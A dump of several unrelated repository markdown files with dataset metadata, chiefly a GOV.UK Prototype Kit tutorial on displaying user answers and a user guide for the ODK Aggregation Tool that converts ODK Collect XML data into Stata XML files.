] | null | null | null | docs/documentation/make-first-prototype/show-users-answers.md | dwp/atw-upload-prototype | 5b74e0ca044a2607f481f8d079c336e6c9ffff1b | [
"MIT"
] | null | null | null | docs/documentation/make-first-prototype/show-users-answers.md | dwp/atw-upload-prototype | 5b74e0ca044a2607f481f8d079c336e6c9ffff1b | [
"MIT"
] | 1 | 2021-04-10T22:23:28.000Z | 2021-04-10T22:23:28.000Z | # Show the user's answers on your 'Check your answers' page
If you do research with real user data, you must clear a user's data before each session by either:
- closing all browser windows and [opening a new incognito window](https://support.google.com/chrome/answer/95464)
- selecting the **Clear data** link at the bottom of the prototype
Check you’ve cleared the data by returning to a previously-loaded page and making sure the data is gone.
## Showing data
To display user data on a different page, use this [Nunjucks](https://mozilla.github.io/nunjucks/) code:
```
{{ data['INPUT-ATTRIBUTE-NAME'] }}
```
Change `INPUT-ATTRIBUTE-NAME` to the value you used in the [`name` attribute on the question page](/docs/make-first-prototype/add-questions#add-a-text-input-to-question-2). For example:
```
{{ data['how-many-balls'] }}
```
### Show the answer to question 1
1. Open the `check-your-answers.html` file in your `app/views` folder.
2. Find the `<dt>` tag that contains the text `Name`.
3. Change `Name` to `Number of balls you can juggle`.
4. In the `<dd>` tag on the next line, change `Sarah Philips` to `{{ data['how-many-balls'] }}`.
You must also change `<span class="govuk-visually-hidden"> name</span>` to `<span class="govuk-visually-hidden"> number of balls you can juggle</span>`.
Screen readers will read the text in the `<span>` tags, but the text will not appear on the page.
### Show the answer to question 2
1. Find the `<dt>` tag that contains the text `Date of birth`.
2. Change `Date of birth` to `Your most impressive juggling trick`.
3. In the `<dd>` tag on the next line, change `5 January 1978` with `{{ data['most-impressive-trick'] }}`.
You must also change `<span class="govuk-visually-hidden"> date of birth</span>` to `<span class="govuk-visually-hidden"> your most impressive juggling trick</span>`.
Go to http://localhost:3000/start and answer the questions to check the answer to question 2 works.
### Delete the remaining example answers
There are example answers on the ‘Check your answers’ template page that you do not need. You can delete these example answers from the `check-your-answers.html` file.
1. Find and delete the section that starts with `<div class="govuk-summary-list__row">` and contains `Contact information`.
2. Find and delete the section that starts with `<div class="govuk-summary-list__row">` and contains `Contact details`.
3. Delete everything from the line that contains `Application details` down to the line that contains `Now send your application`.
| 47.018519 | 185 | 0.734541 | eng_Latn | 0.991276 |
edf7469c09bf2e725cc44a7188d366f83f29f731 | 34 | md | Markdown | README.md | dodofc149-gmail-com/site-de-dodo | ceed7953191140af78d3b9a7fe23e77f8af593cf | [
"MIT"
] | null | null | null | README.md | dodofc149-gmail-com/site-de-dodo | ceed7953191140af78d3b9a7fe23e77f8af593cf | [
"MIT"
] | null | null | null | README.md | dodofc149-gmail-com/site-de-dodo | ceed7953191140af78d3b9a7fe23e77f8af593cf | [
"MIT"
] | null | null | null | # site-de-dodo
portifolio de dodo
| 11.333333 | 18 | 0.764706 | spa_Latn | 0.296102 |
edf7b9412d6974a3344e527fe544f181bbd7a9ec | 9,463 | md | Markdown | docs/user_guide.md | lindsay-stevens/odk_aggregation_tool | 8f02a8cf7b11fba89a519e025d25c2dbf7f83b06 | [
"MIT"
] | null | null | null | docs/user_guide.md | lindsay-stevens/odk_aggregation_tool | 8f02a8cf7b11fba89a519e025d25c2dbf7f83b06 | [
"MIT"
] | null | null | null | docs/user_guide.md | lindsay-stevens/odk_aggregation_tool | 8f02a8cf7b11fba89a519e025d25c2dbf7f83b06 | [
"MIT"
] | null | null | null | # User Guide
## Contents
- [Introduction](#introduction)
- [Purpose](#purpose)
- [Interface](#interface)
- [Behaviour Notes](#behaviour-notes)
- [Messages](#messages)
# Introduction
This document describes how to use the ODK Aggregation Tool (OAT), and provides information on the types of errors that can occur and how to resolve them.
# Purpose
The purpose of the OAT is to enable the preparation of ODK Collect data for analysis in Stata.
The OAT reads the instance XML files produced by ODK Collect, and the XLSForms used to prepare the XForms, and produces an Stata XML file. The Stata XML file includes all the instance XML data, with the metadata such as variable labels, types, formats and value labels. One Stata XML file is produced per XLSForm definition (including all versions).
Since the OAT is a thin wrapper around modules that do the work, the underlying code could either be included in other libraries or extended to support other export formats. Similarly, Stata has a command line control facility for automating analysis or conversion procedures.
# Interface
The user interface presents 3 text boxes for selecting the following inputs:
- "XLSForm definitions path": the folder containing the XLSForm XLSX files to read. This folder should contain at least one XLSForm, but ideally contains a copy of all versions of the XLSForm that were used to collect data.
- "XForm data path": the folder containing the XForm instance XML files to read. This folder should contain at least one XML file.
- "Output path": the folder to save the Stata XML file(s). Additionally, if a large amount of log messages are produced during processing, a "log.txt" file will be saved in this location with a copy of the messages.
The above paths can be either:
- Selected by clicking the corresponding "Browse..." button to the left of the text box
- Copying and pasting in the path
- Typing in the path
Once these inputs have been entered, click the "Run" button to execute the aggregation task. When the task is initiated, a message will be written to the "Last run output" textbox to confirm that the task has started. Any further messages, for example informational or error messages, will be written to the same output textbox. More detail on these messages is included in the below section: "Messages".
Each Stata XML file can be read into Stata using the following command:
```stata
xmluse "//path/to/stata/xml/file.xml", doctype(dta)
```
Stata can then be used to analyse the date, or export it to a wide variety of formats.
# Behaviour Notes
If the amount and/or size of XML files being processed is very large, the OAT may become unresponsive while processing is happening in the background. Once a result has been reached, the output messages will be displayed.
Where multiple versions of a XLSForm have been read, the definitions will be sorted (numerically or alphabetically), and the most recent definition for each variable will be used in the output. For example, in version 1, an item might say "What colour do you like?" and version 2 updated the item to say "What colour do you REALLY like?" - in this case, the version 2 definition is used. This also allows metadata for items that appeared in version 1 but not version 2 to still be included in the output.
If the XForm files include duplicates, the first discovered copy (highest in directory tree / alphabetically) will be used in the output. A message will be shown to indicate which files are duplicates and which one was used. The determination of a "duplicate" is based on the XML file content being exactly the same between one or more files.
Additional notes about output content:
- XML elements read from instance XML files that don't have any matching XLSForm definition will be included as a text variable.
- XML attributes other than the form_id "@id" and form version "@version" will not be included in the output.
- Currently, only the following mappings for XLSForm variable types to Stata data types and formats are included: "start" (str26, %26s), "end" (str26, %26s), "deviceid" (str17, %17s), "date" (int, %td), "text" (str2045, %30s), and "integer" (int, %10.0g)
- Date variables are converted to the Stata Internal Format (SIF) which is an integer representing the number of days (positive or negative) between the specified date, and the Stata zero date of "1960-01-01".
- Metadata is read from the following XLSForm locations for Stata purposes, each is assumed to have content that is valid for each use in Stata (e.g. contains valid characters):
- "name": used for the Stata variable name
- "type": used to determine Stata data type and format, per the above mappings.
- "label": used for variable labels. If a (non-standard) column named "name_description" is included, this is used in preference to the label column.
- "choices" sheet: used for value label definitions
# Messages
The following types of messages may be shown, and are listed in approximately the order that they might be expected to be encountered.
Error messages are indicated by "ERROR" - in general these problems must be resolved. Informational messages are indicated by "INFO" - these indicate the performance of normal behaviour and may be used to help understand the nature of the output.
- ERROR: "*input* is empty ...": the named input textbox requires a value but it is currently empty.
- ERROR: "*input* does not correspond to an existing directory": the named input textbox has a value which doesn't correspond to a directory that exists, or is accessible.
- ERROR: " ... while trying to read the XLSX file at the following path ...": the named XLSX file could not be read. It may be open (e.g. "Permission denied" error), or an invalid file (e.g. "Corrupt file" error). Try to collect the known good, valid XLSForms into a separate directory and use that instead.
- ERROR: "The required sheets for an XLSForm definition ... were not found": the input XLSForm directoy included XLSX files that did not contain the sheets required for a valid XLSForm definition - as above, try to collect the known good, valid XLSForms into a separate directory and use that instead.
- ERROR: "No XLSForms were read from the specified path": try to collect the known good, valid XLSForms into a separate directory and use that instead.
- INFO: "The following XLSForm form_ids were read": these XLSForm definitions will be processed.
- INFO: "Reading XLSForms for form_id *id*, sorted by version in order of *versions*": the metadata is being preferentially read from the XLSForm versions in the stated order. If there are missing versions, try to collect the known good, valid XLSForms into a separate directory and use that instead.
- INFO: "Removed XML attributes from parsed data ...": the only XML attributes included in the output are "@id" (form_id) and "@version" (form version). Any attributes listed in this message were removed.
- INFO: "Found duplicate XML files ...": the listed XML files appeared to be exact duplicates, and only the first listed will be included in the output. Check the named XML files and remove any genuine duplicates, or adjust the "XForm data path" input parameter to be more specific to a location without duplicates.
- INFO: "Data was read for the following variables, but there was no metadata for them in the XLSForms ...": the listed variables were found in the XML data but there wasn't any definitions available in the processed XLSForms. This will mean that output file will include the variable values as text, without any particular labelling. If there is a XLSForm definition specifying metadata for this variable, include it in the input path selected for "XLSForm definitions path".
- INFO: "Metadata added to form_id *id* for the following unknown variables ...": the listed variables were successfully added to the form definition for the purposes of further processing; all this means is that they will be included in the output for the current task run.
- INFO: "Removed variable metadata for the following fields assumed to be empty labelling variables (type=text and read_only=yes)": since the XLSForm and XML data includes elements for variables that are text and don't accept input, but are included for labelling purposes. These variables are removed from the output data as they contain no information.
- INFO: "Using default language: *lang*, for metadata with form_id *id*": in the XLSForms settings sheet, a default language is specified. If multiple languages are defined for the variable or value labels, this default language is used for the Stata XML output.
- INFO: "Found non-integer value in choice list: *name*, value: *value*. Variables using this choice list will not have labelling applied as Stata only allows labelling integer values.": the stated choice list included a value that could not be converted to an integer. Stata only allows value labelling of integer values, so values for variables that use that choice list will not have labelling applied..
- INFO: "Collected data for *count* observations for form_id: *id*": the stated number of observations were included in the output for the stated form_id. If this is less than expected, check that the input path for "XForm data path" is correct, and contains all relevant XML files.
- INFO: "Wrote form data for form_id: *id*, to a file at: *path*": the Stata XML file for the stated form id was written to the stated path.
| 106.325843 | 504 | 0.777238 | eng_Latn | 0.999745 |
edf7dd9479b2c03e1f4b230899ef519f411d26e6 | 103 | md | Markdown | README.md | Mearsu/Sietor | c3ac2b8bb6f52542845077650a06cd3519228769 | [
"Apache-2.0"
] | null | null | null | README.md | Mearsu/Sietor | c3ac2b8bb6f52542845077650a06cd3519228769 | [
"Apache-2.0"
] | null | null | null | README.md | Mearsu/Sietor | c3ac2b8bb6f52542845077650a06cd3519228769 | [
"Apache-2.0"
] | null | null | null | # Sietor
Sietor is my attempt at makinga text editor, it isn't finished, atm I'm working on rendering
| 25.75 | 92 | 0.76699 | eng_Latn | 0.997836 |
edf7deba7cb5838aacc75bf88bdf152f72d33a3b | 771 | md | Markdown | windows.system.remotesystems/remotesystemdiscoverytypefilter.md | stefb965/winrt-api | 89da6197d3c4c09e3bbb4966b984a6da790614f3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | windows.system.remotesystems/remotesystemdiscoverytypefilter.md | stefb965/winrt-api | 89da6197d3c4c09e3bbb4966b984a6da790614f3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | windows.system.remotesystems/remotesystemdiscoverytypefilter.md | stefb965/winrt-api | 89da6197d3c4c09e3bbb4966b984a6da790614f3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
-api-id: T:Windows.System.RemoteSystems.RemoteSystemDiscoveryTypeFilter
-api-type: winrt class
---
<!-- Class syntax.
public class RemoteSystemDiscoveryTypeFilter : Windows.System.RemoteSystems.IRemoteSystemDiscoveryTypeFilter, Windows.System.RemoteSystems.IRemoteSystemFilter
-->
# Windows.System.RemoteSystems.RemoteSystemDiscoveryTypeFilter
## -description
An [IRemoteSystemFilter](iremotesystemfilter.md) that limits the set of discoverable remote systems by allowing only those of a specific discovery type.
## -remarks
## -examples
## -see-also
[Connected apps and devices (Project "Rome")](https://msdn.microsoft.com/en-us/windows/uwp/launch-resume/connected-apps-and-devices), [IRemoteSystemFilter](iremotesystemfilter.md)
## -capabilities
remoteSystem | 33.521739 | 179 | 0.806744 | eng_Latn | 0.332365 |
edf96493f8c1fd43b9315ba99c128276e428e46c | 791 | md | Markdown | docs/modules/_src_entities_linkedin_job_posting_.md | phanluanint/linkedin-private-api | e629272fe527c2a76df973937b96752930df6b8a | [
"MIT"
] | 141 | 2020-10-09T17:53:07.000Z | 2022-03-23T00:41:23.000Z | docs/modules/_src_entities_linkedin_job_posting_.md | phanluanint/linkedin-private-api | e629272fe527c2a76df973937b96752930df6b8a | [
"MIT"
] | 206 | 2020-10-10T09:11:09.000Z | 2022-03-28T03:06:52.000Z | docs/modules/_src_entities_linkedin_job_posting_.md | phanluanint/linkedin-private-api | e629272fe527c2a76df973937b96752930df6b8a | [
"MIT"
] | 34 | 2020-10-11T19:46:47.000Z | 2022-02-18T08:24:32.000Z | **[linkedin-private-api](../README.md)**
> [Globals](../globals.md) / "src/entities/linkedin-job-posting"
# Module: "src/entities/linkedin-job-posting"
## Index
### Interfaces
- [LinkedInJobPosting](../interfaces/_src_entities_linkedin_job_posting_.linkedinjobposting.md)
- [LinkedInJobPostingCompany](../interfaces/_src_entities_linkedin_job_posting_.linkedinjobpostingcompany.md)
### Variables
- [JOB_POSTING_TYPE](_src_entities_linkedin_job_posting_.md#job_posting_type)
## Variables
### JOB_POSTING_TYPE
• `Const` **JOB_POSTING_TYPE**: \"com.linkedin.voyager.jobs.JobPosting\" = "com.linkedin.voyager.jobs.JobPosting"
_Defined in [src/entities/linkedin-job-posting.ts:1](https://github.com/eilonmore/linkedin-private-api/blob/84c9c15/src/entities/linkedin-job-posting.ts#L1)_
| 31.64 | 157 | 0.780025 | yue_Hant | 0.257154 |
edfa01b2c29819e0ae953ddb3eae00466132252b | 3,349 | md | Markdown | README.md | Nemocdz/CDZPicker | 6f66e51e1557acff5d0bc433ef6eeea42baf1b84 | [
"MIT"
] | 28 | 2017-05-31T07:52:43.000Z | 2021-04-28T14:16:16.000Z | README.md | Nemocdz/CDZPickerViewDemo | 6f66e51e1557acff5d0bc433ef6eeea42baf1b84 | [
"MIT"
] | null | null | null | README.md | Nemocdz/CDZPickerViewDemo | 6f66e51e1557acff5d0bc433ef6eeea42baf1b84 | [
"MIT"
] | 6 | 2017-09-16T00:44:08.000Z | 2021-07-18T08:46:51.000Z | # CDZPicker
This is a small Picker easy to use. The datas can be linkage.(For example country - city)
## Demo Preview

## Changelog
- Fix Frame when superView is not corret frame
- Add builder to custom the picker
- Return Selected Indexs
## Installation
### Manual
Add "CDZPicker" files to your project
### CocoaPods
Add ``pod 'CDZPicker'`` in your Podfile
## Usage
``#import "CDZPicker.h"``
- Single:
```objective-c
[CDZPicker showSinglePickerInView:self.view withBuilder:nil strings:@[@"objective-c",@"java",@"python",@"php"] confirm:^(NSArray<NSString *> * _Nonnull strings, NSArray<NSNumber *> * _Nonnull indexs) {
self.label.text = strings.firstObject;
}cancel:^{
//your code
}];
```
- Multiple & Unlinkage:
```objective-c
[CDZPicker showMultiPickerInView:self.view withBuilder:nil stringArrays:@[@[@"MacOS",@"Windows",@"Linux",@"Ubuntu"],@[@"Xcode",@"VSCode",@"Sublime",@"Atom"]] confirm:^(NSArray<NSString *> * _Nonnull strings, NSArray<NSNumber *> * _Nonnull indexs) {
self.label.text = [strings componentsJoinedByString:@"+"];
} cancel:^{
// your code
}];
```
- Multiple & Linkage:
First config the objects and its subArray.
```objective-c
CDZPickerComponentObject *haizhu = [[CDZPickerComponentObject alloc]initWithText:@"海珠区"];
CDZPickerComponentObject *yuexiu = [[CDZPickerComponentObject alloc]initWithText:@"越秀区"];
CDZPickerComponentObject *guangzhou = [[CDZPickerComponentObject alloc]initWithText:@"广州市"];
guangzhou.subArray = [NSMutableArray arrayWithObjects:haizhu,yuexiu, nil];
CDZPickerComponentObject *xiangqiao = [[CDZPickerComponentObject alloc]initWithText:@"湘桥区"];
CDZPickerComponentObject *chaozhou = [[CDZPickerComponentObject alloc]initWithText:@"潮州市"];
chaozhou.subArray = [NSMutableArray arrayWithObjects:xiangqiao, nil];
CDZPickerComponentObject *guangdong = [[CDZPickerComponentObject alloc]initWithText:@"广东省"];
guangdong.subArray = [NSMutableArray arrayWithObjects:guangzhou,chaozhou, nil];
CDZPickerComponentObject *pixian = [[CDZPickerComponentObject alloc]initWithText:@"郫县"];
CDZPickerComponentObject *chengdu = [[CDZPickerComponentObject alloc]initWithText:@"成都市"];
chengdu.subArray = [NSMutableArray arrayWithObjects:pixian, nil];
CDZPickerComponentObject *leshan = [[CDZPickerComponentObject alloc]initWithText:@"乐山市"];
CDZPickerComponentObject *sichuan = [[CDZPickerComponentObject alloc]initWithText:@"四川省"];
sichuan.subArray = [NSMutableArray arrayWithObjects:chengdu,leshan, nil];
```
```objective-c
[CDZPicker showLinkagePickerInView:self.view withBuilder:nil components:@[guangdong,sichuan] confirm:^(NSArray<NSString *> * _Nonnull strings, NSArray<NSNumber *> * _Nonnull indexs) {
self.label.text = [strings componentsJoinedByString:@","];
}cancel:^{
//your code
}];
```
## Articles
[iOS中封装一个自定义UIPickerView(Button篇)](http://www.jianshu.com/p/bf7f304ee308)
[iOS中实现一个小巧的多列联动的PickerView](http://www.jianshu.com/p/ab35c440a352)
## Requirements
iOS 8.0 Above
## TODO
- Add config of labels.
## Contact
- Open a issue
- QQ:757765420
- Email:nemocdz@gmail.com
- Weibo:[@Nemocdz](http://weibo.com/nemocdz)
## License
CDZPicker is available under the MIT license. See the LICENSE file for more info.
| 30.171171 | 249 | 0.734846 | yue_Hant | 0.475879 |
edfa491586a36972de3714c8a342a7771af281a4 | 1,306 | md | Markdown | README.md | chen0040/java-basic-blockchain | a1f81f4996fe8c9de84303a57d46abc01bcfe2f3 | [
"MIT"
] | 7 | 2018-06-16T07:44:55.000Z | 2020-10-26T19:34:51.000Z | README.md | chen0040/java-basic-blockchain | a1f81f4996fe8c9de84303a57d46abc01bcfe2f3 | [
"MIT"
] | null | null | null | README.md | chen0040/java-basic-blockchain | a1f81f4996fe8c9de84303a57d46abc01bcfe2f3 | [
"MIT"
] | 2 | 2020-01-02T15:49:24.000Z | 2021-05-15T08:05:53.000Z | # java-basic-blockchain
Proof-of-concept block chain implementation in Java
This project is a java POC implementation of a [python basic block chain implementation](https://hackernoon.com/learn-blockchains-by-building-one-117428612f46)
# Usage
Build the block chain jar file using make.ps1 (on Windows) or make.sh (on Unix), this will create the jar file
[basic-blockchain.jar](basic-blockchain.jar)
Now run the following command:
```bash
java -jar basic-blockchain.jar
```
This will start the block chain node at http://localhost:3088
Now to run a second basic block chain node:
```bash
java -jar basic-blockchain.jar http://localhost:3088
```
This will start the second block chain node at http://localhost:3089 and uses the node at http://localhost:3088 as the
seed node to broadcast its ip address.
The following api is available for the block chain:
* http://localhost:3088/mine: mine by running proof-of-work in the current node
* http://localhost:3088/nodes/resolve: achieve consensus in the block chain network by resolving conflicts
* http://localhost:3088/transactions/new: add a new transaction to the current node
* http://localhost:3088/chain: return the chain stored in the current node
* http://localhost:3088/nodes: return the list of nodes participating in the block chain
| 32.65 | 159 | 0.774119 | eng_Latn | 0.927471 |
edfa4e8113c1afc8178965d5cfe221fdf320140b | 4,545 | md | Markdown | README.md | UdeS-GRO/S4H2021-QuadrUS | 98a0a22bae58424109f8d7566d55acffa251e72f | [
"MIT"
] | 7 | 2021-01-20T16:01:30.000Z | 2022-03-04T16:45:41.000Z | README.md | UdeS-GRO/S4H2021-QuadrUS | 98a0a22bae58424109f8d7566d55acffa251e72f | [
"MIT"
] | 66 | 2021-01-20T15:54:59.000Z | 2021-03-24T13:38:54.000Z | README.md | UdeS-GRO/S4H2021-QuadrUS | 98a0a22bae58424109f8d7566d55acffa251e72f | [
"MIT"
] | 4 | 2021-06-08T17:52:17.000Z | 2022-03-04T16:42:46.000Z | # S4H2021-QuadrUS
### Quadruped Robot | UdeS-GRO
[](http://makeapullrequest.com) [](https://opensource.com/resources/what-open-source) [](https://opensource.org/licenses/MIT)
## Original contributors
 <br>
**From left to right :** Anthony Breton; Jonathan Oreste Maruca; Diego-Alonso Leblanc-Romero; Charles Vuong; Mathias Bourgault; Olivier Fournier
## Final Product

## Table of contents
* [Development environment](#Development-environment)
* [Needed installation](#ROS-installation)
* [To set up this ROS project](#to-set-up-this-ROS-project)
* [Using this repository](#Using-this-repository)
* [Creating and launching the GUI](#Creating-and-launching-the-GUI)
* [Launching 2D and 3D simulations without GUI](#Launching-2D-and-3D-simulations-without-GUI)
* [Robot environment](#Robot-environment)
## Development environment
### System requirements
- Ubuntu 20.04 LTS
### Dependencies
- ROS Noetic
- Gazebo
- Pybullet
- Gym
- Scipy
- Numpy
- ROS Joy
- ROS Control
### ROS installation (Development environment)
- ROS Noetic Ninjemys: [Installation documentation](http://wiki.ros.org/noetic/Installation/Ubuntu)
- Gazebo/Rviz : Choose Desktop-Full Install option when installing ROS
### Dependencies installation (packages and second environment)
- Install Terminator
```
sudo apt-get update
```
```
sudo apt-get install terminator
```
- Install all dependencies for Kinematics
```
sudo apt install python3-pip
```
```
sudo apt install python-is-python3
```
```
sudo apt install ros-noetic-joy
```
```
sudo apt install ros-noetic-rosserial
```
```
sudo apt install ros-noetic-rosserial-python
```
```
sudo apt install ros-noetic-rosserial-arduino
```
```
pip3 install pybullet
```
```
pip3 install gym
```
- Install all dependencies for control
```
sudo apt install ros-noetic-ros-control
```
```
sudo apt install ros-noetic-robot-state-publisher
```
```
sudo apt install ros-noetic-control-msgs
```
### To set up this ROS project
- Create and initialize a catkin workspace
```
mkdir -p ~/quadrus_ws/src
```
```
cd ~/quadrus_ws/src
```
```
catkin_init_workspace
```
- Clone the git repository into the src folder
```
git clone --recurse-submodules https://github.com/olivierfournier2/S4H2021-QuadrUS.git
```
- Build the ROS workspace
```
cd ~/quadrus_ws
```
```
catkin_make
```
```
. ~/quadrus_ws/devel/setup.bash
```
At this point, the ROS environment should be set up and ready to work with.
## Using this repository
### Creating and launching the GUI
- Start by launching a terminal
- Access the GUI sub-folder:
```
cd ~/quadrus_ws/src/S4H2021-QuadrUS/PyQt5
```
- Create the executable :
```
chmod +x quadrus.py
```
- In this folder launch the GUI with:
```
./quadrus.py
```
### Launching 2D and 3D simulations without GUI
- Start by launching terminator and splitting into two terminals (T1 and T2)
- Launch roscore, the main ros node in T1:
```
roscore
```
- To view the robot model in Rviz, execute the following command in T2:
```
roslaunch qd_master qd_master.launch mode:=sim sim_mode:=kin
```
- To start the dynamic simulation in Gazebo, execute the following command in T2:
```
roslaunch qd_master qd_master.launch mode:=sim sim_mode:=dyn
```
## Robot environment
### System Requirements
- RaspberryPi 4
- Ubuntu 20.04.2 LTS, 64 bit
### ROS installation
- ROS Noetic Ninjemys: [Installation documentation](http://wiki.ros.org/noetic/Installation/Ubuntu)
### Network setup
- Set up raspberry pi as access point: [Procedure](https://gist.github.com/ExtremeGTX/ea1d1c12dde8261b263ab2fead983dc8)
- To allow ssh over wired connection, you need to set up static ip adress for both devices: [Procedure](https://linuxize.com/post/how-to-configure-static-ip-address-on-ubuntu-20-04/)
| 25.971429 | 359 | 0.682288 | eng_Latn | 0.486225 |
edfa78628494cabd621c7624f9e56aaa9e7649ed | 83 | md | Markdown | README.md | zcomert/interactiveImageSegmentation | 66861b4840cee49b8254379404c63ad1ff6e3db7 | [
"MIT"
] | 1 | 2022-01-06T15:09:38.000Z | 2022-01-06T15:09:38.000Z | README.md | zcomert/interactiveImageSegmentation | 66861b4840cee49b8254379404c63ad1ff6e3db7 | [
"MIT"
] | null | null | null | README.md | zcomert/interactiveImageSegmentation | 66861b4840cee49b8254379404c63ad1ff6e3db7 | [
"MIT"
] | null | null | null | # interactiveImageSegmentation
An interactive Matlab app for image segmentation.
| 27.666667 | 51 | 0.843373 | eng_Latn | 0.59374 |
edfa99f37697e83081969e5df851c8e9cab5f009 | 2,974 | md | Markdown | links.md | fractalcitta/fractalcitta.github.io | 6408b782858f48cf7c6d6522b44dbedfcb7b2549 | [
"MIT"
] | null | null | null | links.md | fractalcitta/fractalcitta.github.io | 6408b782858f48cf7c6d6522b44dbedfcb7b2549 | [
"MIT"
] | null | null | null | links.md | fractalcitta/fractalcitta.github.io | 6408b782858f48cf7c6d6522b44dbedfcb7b2549 | [
"MIT"
] | null | null | null | ---
layout: page
title: Links
---
- [yatiko.c1.biz](http://www.yatiko.c1.biz/) : My old website
### Dhamma in English
- [youtube.com](https://www.youtube.com/channel/UCCRXOn6Tsrgm9gJR4z3qLZA) : Ajahn Sona's Chanel
- [youtube.com](https://www.youtube.com/c/AjahnPunnadhammo) : Ajahn Punnadhammo's Chanel
- [youtube.com](https://www.youtube.com/channel/UCsgmmAelfZ2kfXZ08xlHpDw) : Amaravati Monastery Chanel
- [dhammatalks.org](http://www.dhammatalks.org) : Ajahn Thanissaro's Website
- [forestsangha.org](http://www.forestsangha.org) : Ajahn Chah lineage
- [suttacentral.org](http://www.suttacentral.org) : Sutta translations
- [paliaudio.com](http://www.paliaudio.com) : Sutta audio recordings
- [dhamma.org](http://www.dhamma.org) : Vipassana tradition
- [dhammasukha.org](http://www.dhammasukha.org) : Bhante Vimalaramsi's Webiste
- [pathpress.org](https://pathpress.org/) : Path Press Publication
- [fourthmessenger.org](https://www.fourthmessenger.org/) : The Fourth Messenger
### Dhamma en français
- [sanghadelaforet.org](http://www.sanghadelaforet.org) : Lignée d'Ajahn Chah
- [buddha-vacana.org](http://www.buddha-vacana.org/fr/) : Traduction de sutta
- [audiosutta.com](http://www.audiosutta.com) : Enregistrements audio de Sutta
- [dhammadelaforet.org](http://www.dhammadelaforet.org) : Dhamma de la forêt
- [refugebouddhique.com](http://www.refugebouddhique.com/) : Le refuge
- [dhammadana.org](http://www.dhammadana.org) : Bouddhsime originel
- [buddha-sasana.org](http://buddha-sasana.org/) : Bouddhisme originel
### Github & Jekyll
This site is build on GitHub using a fork of the [hitchens](https://github.com/patdryburgh/hitchens/) repository.
- [GitHub Repo](https://github.com/fractalcitta/fractalcitta.github.io) : For this website
- [stephaniehicks.com](http://www.stephaniehicks.com/githubPages_tutorial/pages/githubpages-jekyll.html) : Git and jekyll tutorial
- [kbroman.org](https://kbroman.org/github_tutorial/pages/init.html) : Another Git tutorial
- [jekyllcodex.org](https://jekyllcodex.org/) : Doc with addons
- [gettalong.org](https://kramdown.gettalong.org/quickref.html) : Kramdown Markup
The background images for this website are created using the [Clifford Attractor](https://observablehq.com/@mbostock/clifford-attractor-iii?collection=@observablehq/webgl).
Some usefull code :
~~~
git pull origin
git clone <url>
git add .
git commit
git remote -v
git remote add origin <url>
git push origin master
~~~
bundle install
bundle exec jekyll serve
### Coding
- [aravindiyer.com](https://www.aravindiyer.com/posts/equal-height-image-gallery) : Flex layouts
- [jakearchibald.github.io](https://jakearchibald.github.io/svgomg/) : Minifing SVGs
- [overleaf.com](https://fr.overleaf.com/): Create LaTex document online
- [observablehq.com](https://observablehq.com/) : Code JS and D3 online
- [itools.com](http://itools.com/tool/google-translate-web-page-translator) : Translate a website
- https://usefulcharts.com/
| 40.189189 | 172 | 0.747478 | kor_Hang | 0.238158 |
edfb5695fae5fe23df526e3ff71e438eb636e1e1 | 747 | md | Markdown | 2008/CVE-2008-1279.md | sei-vsarvepalli/cve | fbd9def72dd8f1b479c71594bfd55ddb1c3be051 | [
"MIT"
] | 4 | 2022-03-01T12:31:42.000Z | 2022-03-29T02:35:57.000Z | 2008/CVE-2008-1279.md | sei-vsarvepalli/cve | fbd9def72dd8f1b479c71594bfd55ddb1c3be051 | [
"MIT"
] | null | null | null | 2008/CVE-2008-1279.md | sei-vsarvepalli/cve | fbd9def72dd8f1b479c71594bfd55ddb1c3be051 | [
"MIT"
] | 1 | 2022-03-29T02:35:58.000Z | 2022-03-29T02:35:58.000Z | ### [CVE-2008-1279](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1279)



### Description
Acronis True Image Group Server 1.5.19.191 and earlier, included in Acronis True Image Enterprise Server 9.5.0.8072 and the other True Image packages, allows remote attackers to cause a denial of service (crash) via a packet with an invalid length field, which causes an out-of-bounds read.
### POC
#### Reference
- http://aluigi.altervista.org/adv/acrogroup-adv.txt
#### Github
No GitHub POC found.
| 41.5 | 290 | 0.748327 | eng_Latn | 0.536361 |
edfbfb9a44d2d7d7e8da11418f370133b1ade146 | 1,578 | md | Markdown | _api/advocates_get.md | YitziG/yitzig.github.io | 836a6fc30f413ee5e63de3b4ec1ab94e3b504aaf | [
"MIT"
] | null | null | null | _api/advocates_get.md | YitziG/yitzig.github.io | 836a6fc30f413ee5e63de3b4ec1ab94e3b504aaf | [
"MIT"
] | null | null | null | _api/advocates_get.md | YitziG/yitzig.github.io | 836a6fc30f413ee5e63de3b4ec1ab94e3b504aaf | [
"MIT"
] | null | null | null | ---
title: /advocates/:id
position: 1.1
type: get
description: Get Advocate
parameters:
- name:
content:
content_markdown: |-
Returns a specific advocate from your collection
left_code_blocks:
- code_block: |-
$.get("http://api.myapp.com/advocates/yitzi", {
token: "YOUR_APP_KEY",
}, function(data) {
alert(data);
});
title: jQuery
language: javascript
- code_block: |-
r = requests.get("http://api.devrel.com/advocates/yitzi", token="YOUR_APP_KEY")
print r.text
title: Python
language: python
- code_block: |-
var request = require("request");
request("http://api.devrel.com/advocates/yitzi?token=YOUR_APP_KEY", function (error, response, body) {
if (!error && response.statusCode == 200) {
console.log(body);
}
title: Node.js
language: javascript
- code_block: |-
curl http://sampleapi.devrel.com/advocates/yitzi?key=YOUR_APP_KEY
title: Curl
language: bash
right_code_blocks:
- code_block: |2-
{
"user": "yitzi",
"degree": "BSc Computer Science",
"college": "Jersalem College of Technology",
"email": "yitzi@startbetshemesh.com",
"linkedin": "yitzi.dev/li",
"employer" : "Sifra",
"position" : "Developer Advocate",
"resume" : "yitzi.dev/resume",
"note": "Grab if available!"
}
title: Response
language: json
- code_block: |2-
{
"error": true,
"message": "Advocate doesn't exist"
}
title: Error
language: json
--- | 26.745763 | 108 | 0.598226 | eng_Latn | 0.356684 |
edfc30d0f9ef61d765a262105fdfe0319996d021 | 371 | md | Markdown | docs/endpoints/entry.md | TypedRest/typedrest.net | eb2bc76afa0a8f30631027d60647ae2d1e265a98 | [
"MIT"
] | null | null | null | docs/endpoints/entry.md | TypedRest/typedrest.net | eb2bc76afa0a8f30631027d60647ae2d1e265a98 | [
"MIT"
